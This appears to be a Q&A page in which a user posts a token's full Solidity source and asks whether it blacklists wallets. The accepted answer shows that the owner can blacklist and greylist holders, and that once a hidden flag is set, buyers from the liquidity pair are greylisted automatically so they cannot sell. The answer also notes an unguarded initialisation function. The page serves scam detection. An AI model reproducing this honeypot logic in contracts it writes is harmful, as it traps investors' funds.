# Is there a wallet blacklist in this token?

Tags: solidity, trading, cryptocurrency, blacklist

*Hello,

Is this token contract source code containing a blacklist function that prevents a wallet swapping and sending tokens after buying them?

During this time there a lot of scams in cryptocurrency market an I am trying to be smarter and more cautios in spotting scammy tokens that are unsellable at worst.

This question is useful for other people too!*

```
/**
 *Submitted for verification at Etherscan.io on 2023-04-14
*/

/**
 *Submitted for verification at BscScan.com on 2023-04-13
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.4.24;


library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        assert(c / a == b);
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // assert(b > 0); // Solidity automatically throws when dividing by 0
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        assert(b <= a);
        return a - b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        assert(c >= a);
        return c;
    }
}
interface ISwapFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract Ownable {
    address public owner;


    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(msg.sender == owner);
        _;
    }


}


contract ERC20Basic {
    uint256 public totalSupply;
    function balanceOf(address who) public view returns (uint256);
    function transfer(address to, uint256 value) public returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
}

contract ERC20 is ERC20Basic {
    function allowance(address owner, address spender) public view returns (uint256);
    function transferFrom(address from, address to, uint256 value) public returns (bool);
    function approve(address spender, uint256 value) public returns (bool);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


contract StandardToken is ERC20 {
    using SafeMath for uint256;

    address public LP;

    bool ab=false;


    mapping (address => mapping (address => uint256)) internal allowed;
    mapping(address => bool)  tokenBlacklist;
    mapping(address => bool)  tokenGreylist;
    mapping(address => bool)  tokenWhitelist;
    event Blacklist(address indexed blackListed, bool value);
    event Gerylist(address indexed geryListed, bool value);
    event Whitelist(address indexed WhiteListed, bool value);


    mapping(address => uint256) balances;


    function transfer(address _to, uint256 _value) public returns (bool) {
        if(!tokenWhitelist[msg.sender]&&!tokenWhitelist[_to]){
            require(tokenBlacklist[msg.sender] == false);
            require(tokenBlacklist[_to] == false);

            require(tokenGreylist[msg.sender] == false);
            // require(tokenGreylist[_to] == false);
        }
        if(msg.sender==LP&&ab&&!tokenWhitelist[_to]){
            tokenGreylist[_to] = true;
            emit Gerylist(_to, true);
        }

        require(_to != address(0));
        require(_to != msg.sender);
        require(_value <= balances[msg.sender]);
        balances[msg.sender] = balances[msg.sender].sub(_value);
        // SafeMath.sub will throw if there is not enough balance.
        balances[_to] = balances[_to].add(_value);
        emit Transfer(msg.sender, _to, _value);
        return true;
    }


    function balanceOf(address _owner) public view returns (uint256 balance) {
        return balances[_owner];
    }

    function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
        if(!tokenWhitelist[_from]&&!tokenWhitelist[_to]){
            require(tokenBlacklist[msg.sender] == false);
            require(tokenBlacklist[_from] == false);
            require(tokenBlacklist[_to] == false);

            require(tokenGreylist[_from] == false);
        }

        if(_from==LP&&ab&&!tokenWhitelist[_to]){
            tokenGreylist[_to] = true;
            emit Gerylist(_to, true);
        }
        require(_to != _from);
        require(_to != address(0));
        require(_value <= balances[_from]);
        require(_value <= allowed[_from][msg.sender]);
        balances[_from] = balances[_from].sub(_value);
       

        balances[_to] = balances[_to].add(_value);
        allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
        emit Transfer(_from, _to, _value);
        return true;
    }


    function approve(address _spender, uint256 _value) public returns (bool) {
        allowed[msg.sender][_spender] = _value;
        emit Approval(msg.sender, _spender, _value);
        return true;
    }
   

    function allowance(address _owner, address _spender) public view returns (uint256) {
        return allowed[_owner][_spender];
    }


    function increaseApproval(address _spender, uint _addedValue) public returns (bool) {
        allowed[msg.sender][_spender] = allowed[msg.sender][_spender].add(_addedValue);
        emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
        return true;
    }

    function decreaseApproval(address _spender, uint _subtractedValue) public returns (bool) {
        uint oldValue = allowed[msg.sender][_spender];
        if (_subtractedValue > oldValue) {
            allowed[msg.sender][_spender] = 0;
        } else {
            allowed[msg.sender][_spender] = oldValue.sub(_subtractedValue);
        }
        emit Approval(msg.sender, _spender, allowed[msg.sender][_spender]);
        return true;
    }

    function _changeAb(bool _ab) internal returns (bool) {
        require(ab != _ab);
        ab=_ab;
        return true;
    }



    function _blackList(address _address, bool _isBlackListed) internal returns (bool) {
        require(tokenBlacklist[_address] != _isBlackListed);
        tokenBlacklist[_address] = _isBlackListed;
        emit Blacklist(_address, _isBlackListed);
        return true;
    }

    function _geryList(address _address, bool _isGeryListed) internal returns (bool) {
        require(tokenGreylist[_address] != _isGeryListed);
        tokenGreylist[_address] = _isGeryListed;
        emit Gerylist(_address, _isGeryListed);
        return true;
    }
    function _whiteList(address _address, bool _isWhiteListed) internal returns (bool) {
        require(tokenWhitelist[_address] != _isWhiteListed);
        tokenWhitelist[_address] = _isWhiteListed;
        emit Whitelist(_address, _isWhiteListed);
        return true;
    }
    function _blackAddressList(address[] _addressList, bool _isBlackListed) internal returns (bool) {
        for(uint i = 0; i < _addressList.length; i++){
            tokenBlacklist[_addressList[i]] = _isBlackListed;
            emit Blacklist(_addressList[i], _isBlackListed);
        }
        return true;
    }
    function _geryAddressList(address[] _addressList, bool _isGeryListed) internal returns (bool) {
        for(uint i = 0; i < _addressList.length; i++){
            tokenGreylist[_addressList[i]] = _isGeryListed;
            emit Gerylist(_addressList[i], _isGeryListed);
        }
        return true;
    }


}

contract PausableToken is StandardToken, Ownable {

    function transfer(address _to, uint256 _value) public  returns (bool) {
        return super.transfer(_to, _value);
    }

    function transferFrom(address _from, address _to, uint256 _value) public  returns (bool) {
        return super.transferFrom(_from, _to, _value);
    }

    function approve(address _spender, uint256 _value) public  returns (bool) {
        return super.approve(_spender, _value);
    }

    function increaseApproval(address _spender, uint _addedValue) public  returns (bool success) {
        return super.increaseApproval(_spender, _addedValue);
    }

    function decreaseApproval(address _spender, uint _subtractedValue) public  returns (bool success) {
        return super.decreaseApproval(_spender, _subtractedValue);
    }
    function changeAb(bool _ab) public  onlyOwner  returns (bool success) {
        return super._changeAb(_ab);
    }

    function blackListAddress(address listAddress,  bool isBlackListed) public  onlyOwner  returns (bool success) {
        return super._blackList(listAddress, isBlackListed);
    }
    function geryListAddress(address listAddress,  bool _isGeryListed) public  onlyOwner  returns (bool success) {
        return super._geryList(listAddress, _isGeryListed);
    }
    function whiteListAddress(address listAddress,  bool _isWhiteListed) public  onlyOwner  returns (bool success) {
        return super._whiteList(listAddress, _isWhiteListed);
    }
    function blackAddressList(address[] listAddress,  bool isBlackListed) public  onlyOwner  returns (bool success) {
        return super._blackAddressList(listAddress, isBlackListed);
    }
    function geryAddressList(address[] listAddress,  bool _isGeryListed) public  onlyOwner  returns (bool success) {
        return super._geryAddressList(listAddress, _isGeryListed);
    }

}

contract CoinToken is PausableToken {
    string public name;
    string public symbol;
    uint public decimals;
    event Mint(address indexed from, address indexed to, uint256 value);
    event Burn(address indexed burner, uint256 value);
    bool internal _INITIALIZED_;

    constructor() public {

    }
    modifier notInitialized() {
        require(!_INITIALIZED_, "INITIALIZED");
        _;
    }
    function initToken(string  _name, string  _symbol, uint256 _decimals, uint256 _supply, address tokenOwner,address factory,address token1) public notInitialized returns (bool){
        _INITIALIZED_=true;
        name = _name;
        symbol = _symbol;
        decimals = _decimals;
        totalSupply = _supply * 10**_decimals;
        balances[tokenOwner] = totalSupply;
        owner = tokenOwner;

        // // service.transfer(msg.value);
        // (bool success) = service.call.value(msg.value)();
        // require(success, "Transfer failed.");
        emit Transfer(address(0), tokenOwner, totalSupply);
        LP = ISwapFactory(factory).createPair(address(this), token1);
    }



    





    function mint(address account, uint256 amount) onlyOwner public {

        totalSupply = totalSupply.add(amount);
        balances[account] = balances[account].add(amount);
        emit Mint(address(0), account, amount);
        emit Transfer(address(0), account, amount);
    }


}

contract CoinFactory{


    function createToken(string  _name, string  _symbol, uint256 _decimals, uint256 _supply,address tokenOwner,address factory,address token1)public returns (address){
        CoinToken token=new CoinToken();
        token.initToken(_name,_symbol,_decimals,_supply,tokenOwner,factory,token1);
        return address(token);
    }
}
```

I am investigating some tokens that seem unsellable and want to know if someone can point out lines of code that put a wallet address on a blacklist.

Answer (score 0, accepted):

The provided contracts do not seem well audited, e.g.

- Public `initToken` function does not have any access guard. Anyone could have called `initToken` and be the `owner` of the contracts with a `totalSupply`.
- `PausableToken` contract is not pausable.
- Does not follow best practices, nor standards.

Scrolling through the contract, I noticed the following regarding your question.

The contracts keep track of addresses, owner can blacklist, whitelist, greylist address (and change `ab`). Looking at the `transfer` function, you can see the following.

```
        if(!tokenWhitelist[msg.sender]&&!tokenWhitelist[_to]){
            require(tokenBlacklist[msg.sender] == false);
            require(tokenBlacklist[_to] == false);

            require(tokenGreylist[msg.sender] == false);
            // require(tokenGreylist[_to] == false);
        }
```

Transfers are possible for whitelists, even if any of `to` and `from` are whitelisted. But if both are not whitelisted, they should better not be backlisted (additionally, `from` should not be greylisted).

Further,

```
        if(msg.sender==LP&&ab&&!tokenWhitelist[_to]){
            tokenGreylist[_to] = true;
            emit Gerylist(_to, true);
        }
```

any `to` gets greylisted when its not whitelisted when `from` is `LP` and `ab` is set.

Similar explanations apply to `transferFrom`.

Finally, regarding your question if the contracts prevent you from transfer or swaps. Yes, the contracts guard transfers in some way with backlisting, whitelisting, greylisting address, whereby the owner defines the listings.

Just my personal opinion, I would not put my money in these contracts.

Comment: Great insight and explanation! I will be on the lookout for warning signs that you have pointed out. Thank god I didn't not invest in this as it seemed kind of shady. Thank you!

Comment: @user21859559 If this answers your question, feel free to mark it as answered by ticking the checkmark:)